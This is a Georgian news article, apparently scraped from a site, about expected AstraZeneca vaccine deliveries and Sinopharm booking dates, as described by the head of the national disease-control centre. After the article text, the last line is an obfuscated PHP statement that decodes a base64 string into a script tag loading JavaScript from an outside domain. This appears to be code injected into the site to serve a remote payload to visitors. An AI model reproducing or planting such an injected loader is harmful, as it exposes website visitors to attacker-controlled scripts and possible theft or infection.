celsiusi
ავერსი საქკაბელი
საქართველოში „ასტრაზენეკას“ მეორე პარტიას 30 აპრილს ველოდებით, მესამე პარტიას კი მაისის შუა რიცხვებში, აღნიშნული ვაქცინები იმ ადამიანების მეორე დოზით ასაცრელად იქნება გამოყენებული, ვინც პირველი დოზა გაიკეთა, – ამის შესახებ საქართველოს პირველ არხს დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელმა, ამირან გამყრელიძემ განუცხადა.
 
ამირან გამყრელიძის თქმით, მართალია „ასტრაზენეკას“ პირველ პარტიას 31 მაისს გასდის ვადა, თუმცა მისივე თქმით, აღნიშნულ ვაქცინაზე მოთხოვნა არსებობს და მაისის განმავლობაში არსებული მარაგი იქნება გამოყენებული.
 
„ასტრაზენეკა“ საკმაოდ იხარჯება ახლა და შემოსულ პირველ პარტიას გავხარჯავთ მაისის განმავლობაში. 30 აპრილს ველოდებით „ასტრაზენეკას“ მეორე პარტიას და შემდეგ მაისის შუა რიცხვებში მესამე პარტიას, რომელიც გამოყენებული იქნება მეორე დოზით ასაცრელად იმ ადამიანებისთვის, ვინც პირველი დოზა გაიკეთა. ამის პრობლემა არ არის. უნდა ვეცადოთ ყველა ერთად, რომ პირველი დოზები არ დარჩეს გამოუყენებელი. უნდა გაფართოვდეს აცრები ქვეყანაში. გამორიცხული არ არის, რომ ასაკმა დაიწიოს ისევე როგორც, მოგეხსენებათ ბევრ ევროპულ ქვეყანაში „ასტრაზენეკაზე“ უკვე 30 წელს ზევით იწყება აცრა. დარწმუნებული ვარ იმუნიზაციის საბჭო მიიღებს გადაწყვეტილებას „ასტრაზენეკაზე“ ასაკობრივი ზღვარის დაწევასთან დაკავშირებით“, – განაცხადა ამირან გამყრელიძემ.
 
მისივე თქმით, „ფაიზერი“ და „სინოფარმი“ გამოყენებული იქნება 18 წლის ზემოთ მოქალაქეებისთვის.
 
რაც შეეხება კონკრეტულად „სინოფარმის“ ვაქცინას, გამყრელიძის თქმით, აღნიშნულ ვაქცინასთან დაკავშირებით ჯავშნების ფანჯარა პორტალზე 27 აპრილს გაიხსნება, „სინოფარმით“ ვაქცინაცია კი 4 მაისიდან დაიწყება.
 
„სინოფარმთან დაკავშირებით ჩვენი რეკომენდაციაც არის და მასზე იყო მსჯელობა იმუნიზაციის სამეცნიერო კომიტეტზე. ამ რეკომენდაციებს განიხილავს იმუნიზაციის გაფართოებული საბჭო. ის გამოყენებული იქნება როგორც არის ინსტრუქციითაც, 18 წლის ზემოთ მოსახლეობაში“, – განაცხადა გამყრელიძემ.
 
წყარო: პირველი არხი
2030
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");